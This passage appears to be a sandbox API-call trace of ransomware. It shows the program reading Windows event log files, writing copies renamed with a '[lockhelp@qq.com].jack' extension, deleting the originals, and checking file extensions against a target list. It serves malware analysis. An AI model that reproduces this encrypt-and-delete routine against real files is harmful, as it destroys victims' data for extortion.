(hFile=0x40c) returned 1 [0209.390] CloseHandle (hObject=0x40c) returned 1 [0209.391] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.391] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx")) returned 1 [0209.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.392] lstrlenW (lpString=".doc") returned 4 [0209.392] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString=".docx") returned 5 [0209.392] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.392] lstrlenW (lpString=".pdf") returned 4 [0209.392] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString=".xls") returned 4 [0209.392] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString=".xlsx") returned 5 [0209.392] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.392] lstrlenW (lpString=".ppt") returned 4 [0209.392] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.392] lstrlenW (lpString=".zip") returned 4 [0209.392] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString=".rar") returned 4 [0209.392] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.392] lstrlenW (lpString=".bz2") returned 4 [0209.392] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString=".7z") returned 3 [0209.393] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString=".dbf") returned 4 [0209.393] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString=".1cd") returned 4 [0209.393] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString=".jpg") returned 4 [0209.393] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString=".doc") returned 4 [0209.393] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString=".docx") returned 5 [0209.393] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.393] lstrlenW (lpString=".pdf") returned 4 [0209.393] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString=".xls") returned 4 [0209.393] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString=".xlsx") returned 5 [0209.393] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.393] lstrlenW (lpString=".ppt") returned 4 [0209.393] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.393] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.393] lstrlenW (lpString=".zip") returned 4 [0209.394] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.394] lstrlenW (lpString=".rar") returned 4 [0209.394] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.394] lstrlenW (lpString=".bz2") returned 4 [0209.394] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.394] lstrlenW (lpString=".7z") returned 3 [0209.394] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.394] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.394] lstrlenW (lpString=".dbf") returned 4 [0209.394] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.394] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.394] lstrlenW (lpString=".1cd") returned 4 [0209.394] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.394] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 55 [0209.394] lstrlenW (lpString=".jpg") returned 4 [0209.394] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.394] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.394] lstrlenW (lpString="Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 42 [0209.394] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.524] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0209.524] CloseHandle (hObject=0x420) returned 1 [0209.524] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 0x20 [0209.524] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.525] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.525] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.525] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.525] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3dc [0209.529] GetLastError () returned 0x0 [0209.529] ReadFile (in: hFile=0x420, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.534] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.536] ReadFile (in: hFile=0x420, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.537] WriteFile (in: hFile=0x3dc, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x128, lpOverlapped=0x0) returned 1 [0209.537] SetEndOfFile (hFile=0x3dc) returned 1 [0209.539] CloseHandle (hObject=0x3dc) returned 1 [0209.541] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.541] SetEndOfFile (hFile=0x420) returned 1 [0209.543] CloseHandle (hObject=0x420) returned 1 [0209.543] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.544] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-whea%4errors.evtx")) returned 1 [0209.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.548] lstrlenW (lpString=".doc") returned 4 [0209.548] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".docx") returned 5 [0209.548] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.548] lstrlenW (lpString=".pdf") returned 4 [0209.548] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".xls") returned 4 [0209.548] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".xlsx") returned 5 [0209.548] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.548] lstrlenW (lpString=".ppt") returned 4 [0209.548] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.548] lstrlenW (lpString=".zip") returned 4 [0209.548] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".rar") returned 4 [0209.548] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".bz2") returned 4 [0209.548] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString=".7z") returned 3 [0209.548] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.548] lstrlenW (lpString=".dbf") returned 4 [0209.548] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.548] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.548] lstrlenW (lpString=".1cd") returned 4 [0209.549] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.549] lstrlenW (lpString=".jpg") returned 4 [0209.549] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.549] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.549] lstrlenW (lpString=".doc") returned 4 [0209.549] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString=".docx") returned 5 [0209.549] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.549] lstrlenW (lpString=".pdf") returned 4 [0209.549] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString=".xls") returned 4 [0209.549] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString=".xlsx") returned 5 [0209.549] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.549] lstrlenW (lpString=".ppt") returned 4 [0209.549] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.549] lstrlenW (lpString=".zip") returned 4 [0209.549] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.549] lstrlenW (lpString=".rar") returned 4 [0209.549] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.550] lstrlenW (lpString=".bz2") returned 4 [0209.550] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.550] lstrlenW (lpString=".7z") returned 3 [0209.550] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.550] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.550] lstrlenW (lpString=".dbf") returned 4 [0209.550] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.550] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.550] lstrlenW (lpString=".1cd") returned 4 [0209.550] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.550] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Kernel-WHEA%4Errors.evtx") returned 50 [0209.550] lstrlenW (lpString=".jpg") returned 4 [0209.550] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.550] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.550] lstrlenW (lpString="Microsoft-Windows-Known Folders API Service.evtx") returned 48 [0209.550] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.551] GetFileSizeEx (in: hFile=0x430, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0209.551] CloseHandle (hObject=0x430) returned 1 [0209.551] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 0x20 [0209.551] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.569] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.569] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.569] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.569] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0209.576] GetLastError () returned 0x0 [0209.576] ReadFile (in: hFile=0x430, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.580] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.581] ReadFile (in: hFile=0x430, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.581] WriteFile (in: hFile=0x420, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x134, lpOverlapped=0x0) returned 1 [0209.581] SetEndOfFile (hFile=0x420) returned 1 [0209.583] CloseHandle (hObject=0x420) returned 1 [0209.585] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.585] SetEndOfFile (hFile=0x430) returned 1 [0209.586] CloseHandle (hObject=0x430) returned 1 [0209.586] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.587] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 1 [0209.594] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.594] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.594] lstrlenW (lpString=".doc") returned 4 [0209.594] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.594] lstrlenW (lpString=".docx") returned 5 [0209.594] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.594] lstrlenW (lpString=".pdf") returned 4 [0209.594] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".xls") returned 4 [0209.595] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".xlsx") returned 5 [0209.595] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.595] lstrlenW (lpString=".ppt") returned 4 [0209.595] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString=".zip") returned 4 [0209.595] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".rar") returned 4 [0209.595] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".bz2") returned 4 [0209.595] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".7z") returned 3 [0209.595] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString=".dbf") returned 4 [0209.595] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString=".1cd") returned 4 [0209.595] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString=".jpg") returned 4 [0209.595] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.595] lstrlenW (lpString=".doc") returned 4 [0209.595] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".docx") returned 5 [0209.595] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.595] lstrlenW (lpString=".pdf") returned 4 [0209.595] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".xls") returned 4 [0209.595] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.595] lstrlenW (lpString=".xlsx") returned 5 [0209.595] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.595] lstrlenW (lpString=".ppt") returned 4 [0209.596] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.596] lstrlenW (lpString=".zip") returned 4 [0209.596] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString=".rar") returned 4 [0209.596] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString=".bz2") returned 4 [0209.596] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString=".7z") returned 3 [0209.596] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.596] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.596] lstrlenW (lpString=".dbf") returned 4 [0209.596] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.596] lstrlenW (lpString=".1cd") returned 4 [0209.596] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0209.596] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx") returned 56 [0209.596] lstrlenW (lpString=".jpg") returned 4 [0209.596] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0209.596] lstrcmpiW (lpString1=".evtx", lpString2=".jack") returned -1 [0209.596] lstrlenW (lpString="Microsoft-Windows-MUI%4Admin.evtx") returned 33 [0209.596] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.597] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x2a1ff14 | out: lpFileSize=0x2a1ff14*=69632) returned 1 [0209.597] CloseHandle (hObject=0x41c) returned 1 [0209.597] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 0x20 [0209.597] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0209.600] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0209.600] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.600] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.600] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x430 [0209.612] GetLastError () returned 0x0 [0209.612] ReadFile (in: hFile=0x41c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x11000, lpOverlapped=0x0) returned 1 [0209.615] WriteFile (in: hFile=0x430, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x11010, lpOverlapped=0x0) returned 1 [0209.616] ReadFile (in: hFile=0x41c, lpBuffer=0x3ce8020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a1fecc, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesRead=0x2a1fecc*=0x0, lpOverlapped=0x0) returned 1 [0209.616] WriteFile (in: hFile=0x430, lpBuffer=0x3ce8020*, nNumberOfBytesToWrite=0x116, lpNumberOfBytesWritten=0x2a1fc94, lpOverlapped=0x0 | out: lpBuffer=0x3ce8020*, lpNumberOfBytesWritten=0x2a1fc94*=0x116, lpOverlapped=0x0) returned 1 [0209.616] SetEndOfFile (hFile=0x430) returned 1 [0209.627] CloseHandle (hObject=0x430) returned 1 [0209.631] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a1fec0 | out: lpNewFilePointer=0x0) returned 1 [0209.631] SetEndOfFile (hFile=0x41c) returned 1 [0209.673] CloseHandle (hObject=0x41c) returned 1 [0209.673] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0209.673] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 1 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.675] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.675] lstrlenW (lpString=".doc") returned 4 [0209.675] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".docx") returned 5 [0209.676] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0209.676] lstrlenW (lpString=".pdf") returned 4 [0209.676] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".xls") returned 4 [0209.676] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".xlsx") returned 5 [0209.676] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0209.676] lstrlenW (lpString=".ppt") returned 4 [0209.676] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString=".zip") returned 4 [0209.676] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".rar") returned 4 [0209.676] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".bz2") returned 4 [0209.676] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0209.676] lstrlenW (lpString=".7z") returned 3 [0209.676] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0209.676] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx") returned 41 [0209.676] lstrlenW (lpString=".dbf") returned 